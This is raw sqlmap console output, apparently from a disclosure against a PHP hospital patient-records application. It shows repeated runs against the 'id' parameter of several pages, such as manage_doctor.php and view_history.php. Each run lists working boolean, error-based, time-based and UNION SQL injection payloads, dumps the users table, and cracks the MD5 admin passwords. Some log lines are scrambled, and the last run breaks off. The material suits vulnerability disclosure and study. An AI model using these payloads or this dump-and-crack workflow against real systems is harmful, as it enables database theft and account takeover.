e88~~\\ 888 888 888-~\\ ,d888 _d88__ Y88b /\n888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/\n888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/\n888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y\n888 888 \"88_-888 888 888 \\_88P \"88___/ \"88__/ \"88_-888 888 888 \"88_/ /\n _/\n {1.6.1.2#dev}\n https://sqlmap.org\n https://www.nu11secur1ty.com/\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 12:01:23 /2022-03-01/\n\n[12:01:23] [INFO] testing connection to the target URL\nyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=62sg9tou51d...eqmgoe9q93'). Do you want to use those [Y/n] Y\n[12:01:23] [INFO] checking if the target is protected by some kind of WAF/IPS\n[12:01:23] [INFO] testing if the target URL content is stable\n[12:01:24] [INFO] target URL content is stable\n[12:01:24] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')\n[12:01:24] [INFO] testing for SQL injection on GET parameter 'id'\nfor the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y\n[12:01:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\n[12:01:24] [WARNING] reflective value(s) found and filtering out\n[12:01:24] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string=\"Sample Ward Room Good for 6 Patient\")\n[12:01:24] [INFO] testing 'Generic inline queries'\n[12:01:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'\n[12:01:24] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'\n[12:01:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'\n[12:01:24] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'\n[12:01:24] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'\n[12:01:24] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'\n[12:01:24] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'\n[12:01:24] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'\n[12:01:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\n[12:01:24] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable\n[12:01:24] [INFO] testing 'MySQL inline queries'\n[12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'\n[12:01:24] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)\n[12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries'\n[12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'\n[12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'\n[12:01:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'\n[12:01:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'\n[12:01:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'\n[12:01:31] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable\n[12:01:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'\n[12:01:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found\n[12:01:31] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test\n[12:01:31] [INFO] target URL appears to have 8 columns in query\n[12:01:31] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable\nGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N\nsqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:\n---\nParameter: id (GET)\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=1' AND 8906=8906 AND 'Accs'='Accs\n\n Type: error-based\n Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\n Payload: id=1' AND (SELECT 1670 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(1670=1670,1))),0x71706b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UIHB'='UIHB\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: id=1' AND (SELECT 6841 FROM (SELECT(SLEEP(3)))ujWo) AND 'sPMh'='sPMh\n\n Type: UNION query\n Title: Generic UNION query (NULL) - 8 columns\n Payload: id=-1901' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x626561436b5273424d6544724748464f566f6851426f484a464c666a777a4768724b61577878704f,0x71706b7671),NULL,NULL,NULL,NULL-- -\n---\n[12:01:31] [INFO] the back-end DBMS is MySQL\nweb application technology: Apache 2.4.52, PHP 8.1.2, PHP\nback-end DBMS: MySQL >= 5.0 (MariaDB fork)\n[12:01:31] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'\n[12:01:31] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'\n[12:01:31] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'\n[12:01:31] [INFO] recognized possible password hashes in column 'password'\ndo you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N\ndo you want to crack them via a dictionary-based attack? [Y/n/q] Y\n[12:01:32] [INFO] using hash method 'md5_generic_passwd'\nwhat dictionary do you want to use?\n[1] default dictionary file 'C:\\Users\\venvaropt\\Desktop\\CVE\\sqlmap\\data\\txt\\wordlist.tx_' (press Enter)\n[2] custom dictionary file\n[3] file with list of dictionary files\n> Y\n[12:01:32] [INFO] using default dictionary\ndo you want to use common password suffixes? (slow!) [y/N] N\n[12:01:32] [INFO] starting dictionary-based cracking (md5_generic_passwd)\n[12:01:32] [INFO] starting 4 processes\n[admin12312:01:38' for user '] [adminINFO' |\n[cblake12:01:48'] cracked password 'stupid123' for user '\nDatabase: hprms_db\nTable: users\n[2 entries]\n+----------+----------------------------------------------+\n| username | password |\n+----------+----------------------------------------------+\n| admin | 0192023a7bbd73250516f069df18b500 (admin123) |\n| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |\n+----------+----------------------------------------------+\n\n[12:02:09] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost\\dump\\hprms_db\\users.csv'\n[12:02:09] [INFO] fetched data logged to text files under 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost'\n\n[*] ending @ 12:02:09 /2022-03-01/\n\nSQL - Injecting for parameter 'id' in manage_doctor.php app\n\n ,d d ,d d8\n888-~88e 888 888 ,d888 ,d888 d88~\\ e88~~8e e88~~\\ 888 888 888-~\\ ,d888 _d88__ Y88b /\n888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/\n888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/\n888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y\n888 888 \"88_-888 888 888 \\_88P \"88___/ \"88__/ \"88_-888 888 888 \"88_/ /\n _/\n {1.6.1.2#dev}\n https://sqlmap.org\n https://www.nu11secur1ty.com/\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 12:02:13 /2022-03-01/\n\n[12:02:13] [INFO] testing connection to the target URL\nyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=4tp11beihnp...3genbf0lef'). Do you want to use those [Y/n] Y\n[12:02:13] [INFO] checking if the target is protected by some kind of WAF/IPS\n[12:02:13] [INFO] testing if the target URL content is stable\n[12:02:14] [INFO] target URL content is stable\n[12:02:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')\n[12:02:14] [INFO] testing for SQL injection on GET parameter 'id'\nfor the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y\n[12:02:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\n[12:02:14] [WARNING] reflective value(s) found and filtering out\n[12:02:14] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string=\"Physical medicine and rehabilitation\")\n[12:02:14] [INFO] testing 'Generic inline queries'\n[12:02:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'\n[12:02:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'\n[12:02:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'\n[12:02:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'\n[12:02:14] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'\n[12:02:14] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'\n[12:02:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'\n[12:02:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'\n[12:02:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\n[12:02:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable\n[12:02:14] [INFO] testing 'MySQL inline queries'\n[12:02:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'\n[12:02:14] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)\n[12:02:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries'\n[12:02:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'\n[12:02:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'\n[12:02:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'\n[12:02:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'\n[12:02:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'\n[12:02:21] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable\n[12:02:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'\n[12:02:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found\n[12:02:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test\n[12:02:21] [INFO] target URL appears to have 8 columns in query\n[12:02:21] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable\nGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N\nsqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:\n---\nParameter: id (GET)\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=1' AND 3105=3105 AND 'nrvQ'='nrvQ\n\n Type: error-based\n Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\n Payload: id=1' AND (SELECT 5846 FROM(SELECT COUNT(*),CONCAT(0x7170767071,(SELECT (ELT(5846=5846,1))),0x717a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NGNn'='NGNn\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: id=1' AND (SELECT 4775 FROM (SELECT(SLEEP(3)))kUeP) AND 'LHyf'='LHyf\n\n Type: UNION query\n Title: Generic UNION query (NULL) - 8 columns\n Payload: id=-4962' UNION ALL SELECT NULL,NULL,CONCAT(0x7170767071,0x47746f4c5467486944786f586c45764a6c59724e6c415375424f5246744c486c456b455055764c70,0x717a706b71),NULL,NULL,NULL,NULL,NULL-- -\n---\n[12:02:21] [INFO] the back-end DBMS is MySQL\nweb application technology: PHP 8.1.2, PHP, Apache 2.4.52\nback-end DBMS: MySQL >= 5.0 (MariaDB fork)\n[12:02:21] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'\n[12:02:21] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'\n[12:02:21] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'\n[12:02:21] [INFO] recognized possible password hashes in column 'password'\ndo you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N\ndo you want to crack them via a dictionary-based attack? [Y/n/q] Y\n[12:02:21] [INFO] using hash method 'md5_generic_passwd'\nwhat dictionary do you want to use?\n[1] default dictionary file 'C:\\Users\\venvaropt\\Desktop\\CVE\\sqlmap\\data\\txt\\wordlist.tx_' (press Enter)\n[2] custom dictionary file\n[3] file with list of dictionary files\n> Y\n[12:02:21] [INFO] using default dictionary\ndo you want to use common password suffixes? (slow!) [y/N] N\n[12:02:21] [INFO] starting dictionary-based cracking (md5_generic_passwd)\n[12:02:21] [INFO] starting 4 processes\n[] [12:02:30INFO] [] cracked password 'INFOadmin123] current status: 19051... \\' for user 'admin'\n[12:02:36] [] [INFOINFO] cracked password 'stupid123] current status: 70891... -' for user 'cblake'\nDatabase: hprms_db\nTable: users\n[2 entries]\n+----------+----------------------------------------------+\n| username | password |\n+----------+----------------------------------------------+\n| admin | 0192023a7bbd73250516f069df18b500 (admin123) |\n| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |\n+----------+----------------------------------------------+\n\n[12:03:01] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost\\dump\\hprms_db\\users.csv'\n[12:03:01] [INFO] fetched data logged to text files under 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost'\n\n[*] ending @ 12:03:01 /2022-03-01/\n\nSQL - Injecting for parameter 'id' in manage_patient.php app\n\n ,d d ,d d8\n888-~88e 888 888 ,d888 ,d888 d88~\\ e88~~8e e88~~\\ 888 888 888-~\\ ,d888 _d88__ Y88b /\n888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/\n888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/\n888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y\n888 888 \"88_-888 888 888 \\_88P \"88___/ \"88__/ \"88_-888 888 888 \"88_/ /\n _/\n {1.6.1.2#dev}\n https://sqlmap.org\n https://www.nu11secur1ty.com/\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 12:03:05 /2022-03-01/\n\n[12:03:06] [INFO] testing connection to the target URL\nyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=3timnfi1ddl...4mandk4la0'). Do you want to use those [Y/n] Y\n[12:03:06] [INFO] checking if the target is protected by some kind of WAF/IPS\n[12:03:06] [INFO] testing if the target URL content is stable\n[12:03:07] [INFO] target URL content is stable\n[12:03:07] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')\n[12:03:07] [INFO] testing for SQL injection on GET parameter 'id'\nfor the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y\n[12:03:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\n[12:03:07] [WARNING] reflective value(s) found and filtering out\n[12:03:07] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string=\"Over There Street, Here City, Anywhere, 2306\")\n[12:03:07] [INFO] testing 'Generic inline queries'\n[12:03:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'\n[12:03:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'\n[12:03:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'\n[12:03:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'\n[12:03:07] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'\n[12:03:07] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'\n[12:03:08] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'\n[12:03:08] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'\n[12:03:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\n[12:03:08] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable\n[12:03:08] [INFO] testing 'MySQL inline queries'\n[12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'\n[12:03:08] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)\n[12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries'\n[12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'\n[12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'\n[12:03:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'\n[12:03:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'\n[12:03:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'\n[12:03:14] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable\n[12:03:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'\n[12:03:14] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found\n[12:03:14] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test\n[12:03:14] [INFO] target URL appears to have 7 columns in query\n[12:03:15] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable\nGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N\nsqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests:\n---\nParameter: id (GET)\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=1' AND 5342=5342 AND 'TSQh'='TSQh\n\n Type: error-based\n Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\n Payload: id=1' AND (SELECT 4644 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(4644=4644,1))),0x71626a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'TAyy'='TAyy\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: id=1' AND (SELECT 2728 FROM (SELECT(SLEEP(3)))orQs) AND 'lADO'='lADO\n\n Type: UNION query\n Title: Generic UNION query (NULL) - 7 columns\n Payload: id=-6378' UNION ALL SELECT CONCAT(0x7162626b71,0x534e7a6c74596e766e426e5667486f7661586c6b445a556f485551486a547562436345664f585462,0x71626a6a71),NULL,NULL,NULL,NULL,NULL,NULL-- -\n---\n[12:03:15] [INFO] the back-end DBMS is MySQL\nweb application technology: PHP 8.1.2, Apache 2.4.52, PHP\nback-end DBMS: MySQL >= 5.0 (MariaDB fork)\n[12:03:15] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'\n[12:03:15] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'\n[12:03:15] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'\n[12:03:15] [INFO] recognized possible password hashes in column 'password'\ndo you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N\ndo you want to crack them via a dictionary-based attack? [Y/n/q] Y\n[12:03:26] [INFO] using hash method 'md5_generic_passwd'\nwhat dictionary do you want to use?\n[1] default dictionary file 'C:\\Users\\venvaropt\\Desktop\\CVE\\sqlmap\\data\\txt\\wordlist.tx_' (press Enter)\n[2] custom dictionary file\n[3] file with list of dictionary files\n> Y\n[12:03:26] [INFO] using default dictionary\ndo you want to use common password suffixes? (slow!) [y/N] N\n[12:03:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)\n[12:03:26] [INFO] starting 4 processes\n[' for user '12:03:32admin] ['O] current status: 1jesu... |] cracked password 'admin123\n[12:03:4212:03:42] [] [INFOINFO] current status: P14O1... |] cracked password 'stupid123' for user 'cblake'\nDatabase: hprms_db\nTable: users\n[2 entries]\n+----------+----------------------------------------------+\n| username | password |\n+----------+----------------------------------------------+\n| admin | 0192023a7bbd73250516f069df18b500 (admin123) |\n| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |\n+----------+----------------------------------------------+\n\n[12:04:04] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost\\dump\\hprms_db\\users.csv'\n[12:04:04] [INFO] fetched data logged to text files under 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost'\n\n[*] ending @ 12:04:04 /2022-03-01/\n\nSQL - Injecting for parameter 'id' in view_history.php app\n\n ,d d ,d d8\n888-~88e 888 888 ,d888 ,d888 d88~\\ e88~~8e e88~~\\ 888 888 888-~\\ ,d888 _d88__ Y88b /\n888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/\n888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/\n888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y\n888 888 \"88_-888 888 888 \\_88P \"88___/ \"88__/ \"88_-888 888 888 \"88_/ /\n _/\n {1.6.1.2#dev}\n https://sqlmap.org\n https://www.nu11secur1ty.com/\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 12:04:09 /2022-03-01/\n\n[12:04:09] [INFO] testing connection to the target URL\nyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=om5n296h9bj...urhf8qd1t0'). Do you want to use those [Y/n] Y\n[12:04:09] [INFO] checking if the target is protected by some kind of WAF/IPS\n[12:04:09] [INFO] testing if the target URL content is stable\n[12:04:10] [INFO] target URL content is stable\n[12:04:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')\n[12:04:10] [INFO] testing for SQL injection on GET parameter 'id'\nfor the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y\n[12:04:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\n[12:04:10] [WARNING] reflective value(s) found and filtering out\n[12:04:10] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'\n[12:04:10] [INFO] testing 'Generic inline queries'\n[12:04:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'\n[12:04:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'\n[12:04:13] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'\n[12:04:14] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable\n[12:04:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'\n[12:04:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'\n[12:04:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'\n[12:04:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'\n[12:04:14] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'\n[12:04:14] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'\n[12:04:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'\n[12:04:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'\n[12:04:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\n[12:04:14] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\n[12:04:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable\n[12:04:14] [INFO] testing 'MySQL inline queries'\n[12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'\n[12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries'\n[12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'\n[12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'\n[12:04:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'\n[12:04:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'\n[12:04:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'\n[12:04:20] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable\n[12:04:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'\n[12:04:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'\n[12:04:20] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found\n[12:04:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test\n[12:04:21] [INFO] target URL appears to have 10 columns in query\n[12:04:21] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable\n[12:04:21] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval\nGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N\nsqlmap identified the following injection point(s) with a total of 154 HTTP(s) requests:\n---\nParameter: id (GET)\n Type: boolean-based blind\n Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)\n Payload: id=1' OR NOT 2894=2894#\n\n Type: error-based\n Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\n Payload: id=1' OR (SELECT 2823 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT (ELT(2823=2823,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NtWR\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: id=1' AND (SELECT 2385 FROM (SELECT(SLEEP(3)))Nuwd)-- bAsV\n\n Type: UNION query\n Title: MySQL UNION query (NULL) - 10 columns\n Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b6a71,0x54706a5a776b54714371787a617078774f7450657455496f7a614e75547177536961544c74546875,0x7170717871),NULL,NULL,NULL,NULL,NULL,NULL#\n---\n[12:04:21] [INFO] the back-end DBMS is MySQL\nweb application technology: PHP, PHP 8.1.2, Apache 2.4.52\nback-end DBMS: MySQL >= 5.0 (MariaDB fork)\n[12:04:21] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'\n[12:04:21] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'\n[12:04:21] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'\n[12:04:21] [INFO] recognized possible password hashes in column 'password'\ndo you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N\ndo you want to crack them via a dictionary-based attack? [Y/n/q] Y\n[12:04:21] [INFO] using 